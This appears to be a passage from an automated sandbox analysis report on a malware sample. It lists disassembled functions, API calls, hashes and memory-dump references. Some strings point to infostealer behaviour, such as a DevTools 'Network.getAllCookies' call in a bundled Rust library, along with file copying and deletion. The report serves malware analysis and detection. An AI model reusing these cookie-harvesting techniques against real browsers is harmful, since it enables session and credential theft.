                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: closesocket$ErrorLastsetsockopt
                                                                                                                                                                                                                                                          • String ID: a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
                                                                                                                                                                                                                                                          • API String ID: 1009131482-2006489008
                                                                                                                                                                                                                                                          • Opcode ID: 0ee9b299cefcb8493263cfd39cb6f46757614c9ad5f37ae57804e45480dd1372
                                                                                                                                                                                                                                                          • Instruction ID: 204985034664a66bdd3696711f6c6de2ae3b94e7d2b9d3303036901813d22851
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ee9b299cefcb8493263cfd39cb6f46757614c9ad5f37ae57804e45480dd1372
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D82256B1504B41DBE320CF25D885B97BBF5BB08318F008A1DD9AA87BA1E775F548CB91
                                                                                                                                                                                                                                                          Function 6CD4D76F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 343COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: stack backtrace:
                                                                                                                                                                                                                                                          • API String ID: 0-2306486365
                                                                                                                                                                                                                                                          • Opcode ID: 4a686de6e333f371c9feaeecd7442eab6c097d6686ad7879b95d50e6ec828b68
                                                                                                                                                                                                                                                          • Instruction ID: 766eb078a367cab0f712caf79b380d3e786a79df39e9059eb0484a49c68e11d1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a686de6e333f371c9feaeecd7442eab6c097d6686ad7879b95d50e6ec828b68
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6F18E75C05B88CFDB22CFB4C8407DABBF0AF1A304F04869ED999AB652D734A545CB61
                                                                                                                                                                                                                                                          Function 6CD11F30 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 307COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 6CD11F7E
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 6CD121B9
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 6CD122D9
                                                                                                                                                                                                                                                            • Part of subcall function 6CD1AC00: HeapFree.KERNEL32(00000000,0000000C), ref: 6CD4EBD8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • {"id": 1, "method": "Network.getAllCookies"}Failed to convert result to CStringmy_library\src\lib.rs, xrefs: 6CD1209C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: closesocket$FreeHeap_strlen
                                                                                                                                                                                                                                                          • String ID: {"id": 1, "method": "Network.getAllCookies"}Failed to convert result to CStringmy_library\src\lib.rs
                                                                                                                                                                                                                                                          • API String ID: 4163113487-637580131
                                                                                                                                                                                                                                                          • Opcode ID: f0b1e58b948f7a91dd5c14b9c6fd501c7ebc61dba063095fe29564f311222089
                                                                                                                                                                                                                                                          • Instruction ID: a6de652ff7276c7308fb0cf98c8de5664c6ffedbd627dd4ca1444adbc8993653
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0b1e58b948f7a91dd5c14b9c6fd501c7ebc61dba063095fe29564f311222089
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70C157B5404B009BD3A0DF25E988B97B7F8FB15318F404A1DE99B86E61EB71F548CB60
                                                                                                                                                                                                                                                          Function 6CD4D6CD Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 223COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: stack backtrace:
                                                                                                                                                                                                                                                          • API String ID: 0-2306486365
                                                                                                                                                                                                                                                          • Opcode ID: d006c33414565a74846b04d5927f98f8d3d1f13a967c69174ace62e99600ea29
                                                                                                                                                                                                                                                          • Instruction ID: 86c9488173e91c71272bc3eca8db2c70acb5973b663c9123f7626ff4a459bc11
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d006c33414565a74846b04d5927f98f8d3d1f13a967c69174ace62e99600ea29
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB919DB5904B848FD722CF64C840B96BBF4AF0A314F048A5ED9DA9BB61D734F509CB61
                                                                                                                                                                                                                                                          Function 00FF029A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00FF02BD
                                                                                                                                                                                                                                                            • Part of subcall function 0100E698: std::exception::exception.LIBCMT ref: 0100E6AD
                                                                                                                                                                                                                                                            • Part of subcall function 0100E698: __CxxThrowException@8.LIBCMT ref: 0100E6C2
                                                                                                                                                                                                                                                            • Part of subcall function 0100E698: std::exception::exception.LIBCMT ref: 0100E6D3
                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00FF035C
                                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00FF0370
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                                                                                                                                                                          • String ID: vector<T> too long
                                                                                                                                                                                                                                                          • API String ID: 2448322171-3788999226
                                                                                                                                                                                                                                                          • Opcode ID: 1c8215a9adfc3c6fc3c72087bc37694c2846789dcb774c4329d76625077cd668
                                                                                                                                                                                                                                                          • Instruction ID: b13bf673e94d98fb261d5e16a308920d014035c55ade8fb6bc019192f6b051e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c8215a9adfc3c6fc3c72087bc37694c2846789dcb774c4329d76625077cd668
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D931C536E502199FDB24EF68E8496BD77A5AB04714F14202EF700E72D6DB749D80DB90
                                                                                                                                                                                                                                                          Function 00FF6FA3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00FF6FAA
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,0000001C), ref: 00FF6FB5
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF7039
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                                                          • String ID: ERROR
                                                                                                                                                                                                                                                          • API String ID: 591506033-2861137601
                                                                                                                                                                                                                                                          • Opcode ID: 3728be980596e35ca54fb565131b053cca37455af65dd6d5388067074e653bc5
                                                                                                                                                                                                                                                          • Instruction ID: f6e58e0c624a645363802a72116ae7eb1944a523f9600c356df9d941bad7e4d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3728be980596e35ca54fb565131b053cca37455af65dd6d5388067074e653bc5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E114C7280050A9FCB50FB74ED066ADBBB4BF04310B904525EA14B7162EB39AA25EFC0
                                                                                                                                                                                                                                                          Function 6CD64FC2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CD64F73,00000000,?,00000001,?,?,?,6CD65062,00000001,FlsFree,6CDAE690,FlsFree), ref: 6CD64FCF
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6CD64F73,00000000,?,00000001,?,?,?,6CD65062,00000001,FlsFree,6CDAE690,FlsFree,00000000,?,6CD63F04), ref: 6CD64FD9
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CD65001
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                          • Opcode ID: 1914f65c652693fcea41d3884fe2a9ac7d949893b2ae8052832d80b749b9914f
                                                                                                                                                                                                                                                          • Instruction ID: d110400f108e1a9f2e4518271c13ed89a2ae103c7ea1bdd4372e332c000e31f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1914f65c652693fcea41d3884fe2a9ac7d949893b2ae8052832d80b749b9914f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E01A30744248B7FF112FA2DD09B893E69AB01B84F244A20FA4EE8CA1E771E955D6D4
                                                                                                                                                                                                                                                          Function 00FF1F84 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FF26D3,?), ref: 00FF1F8F
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FF1F96
                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00FF1FA7
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                          • String ID: %hs
                                                                                                                                                                                                                                                          • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                          • Opcode ID: 973e3cc5bb13119cd32e4a2b0e4b035d26708dd17176d3b243469c9e4f78866d
                                                                                                                                                                                                                                                          • Instruction ID: 2b5e5bbf5e211007085b7ffe43836e3351fe219c55efb663ae8f46636f44eeca
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 973e3cc5bb13119cd32e4a2b0e4b035d26708dd17176d3b243469c9e4f78866d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12D0A7313402167BC6316BD5BC0EF9A3F5CDB05BA2F000020FF4DD9144C96A541057D5
                                                                                                                                                                                                                                                          Function 6CD6A8A2 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(9F8E84B1,00000000,00000000,?), ref: 6CD6A905
                                                                                                                                                                                                                                                            • Part of subcall function 6CD682D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CD6A340,?,00000000,-00000008), ref: 6CD68332
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CD6AB57
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CD6AB9D
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6CD6AC40
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                                          • Opcode ID: f3948bb81c82466bea6af4fbf8a430c950d13771ca660d8c6b4ba9fb1b757418
                                                                                                                                                                                                                                                          • Instruction ID: 2ee8d9d0f4754bc0da77bd848fe23a82e992c121d520733b30bfea415e7bf164
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3948bb81c82466bea6af4fbf8a430c950d13771ca660d8c6b4ba9fb1b757418
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D19DB5D01259DFCB05CFA9C8809EDBBB5EF09304F24412AE56AEBB51D730A945CB60
                                                                                                                                                                                                                                                          Function 00FEB15B Relevance: 6.2, APIs: 4, Instructions: 222filestringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FEB200
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FEB3B6
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FEB3D1
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FEB423
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
